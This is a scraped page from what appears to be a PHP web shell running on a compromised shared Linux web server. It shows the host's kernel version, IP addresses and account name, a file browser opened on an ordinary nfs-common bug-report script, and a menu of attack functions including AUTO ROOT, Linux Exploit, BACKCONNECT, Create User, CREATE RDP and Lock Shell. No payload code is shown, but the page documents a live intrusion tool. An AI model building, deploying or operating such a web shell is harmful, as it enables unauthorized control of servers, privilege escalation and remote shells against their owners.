Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
bug /
nfs-common /
[ HOME SHELL ]
Name
Size
Permission
Action
control
31
B
-rw-r--r--
script
610
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : script
#!/bin/sh set -e echo '-- rpcinfo --' >&3 /usr/sbin/rpcinfo -p >&3 echo '-- /etc/default/nfs-common --' >&3 cat /etc/default/nfs-common|grep -v -e '^\#' -e '^$' >&3 echo '-- /etc/nfs.conf --' >&3 cat /etc/nfs.conf|grep -v -e '^\#' -e '^$' >&3 if [ -d /etc/nfs.conf.d ]; then for f in /etc/nfs.conf.d/*.conf; do echo "-- $f --" >&3 cat "$f" | grep -v -e '^\#' -e '^$' >&3 done fi echo '-- /etc/idmapd.conf --' >&3 cat /etc/idmapd.conf|grep -v -e '^\#' -e '^$' >&3 echo '-- /etc/fstab --' >&3 cat /etc/fstab|grep nfs >&3 echo '-- /proc/mounts --' >&3 cat /proc/mounts|grep nfs >&3
Close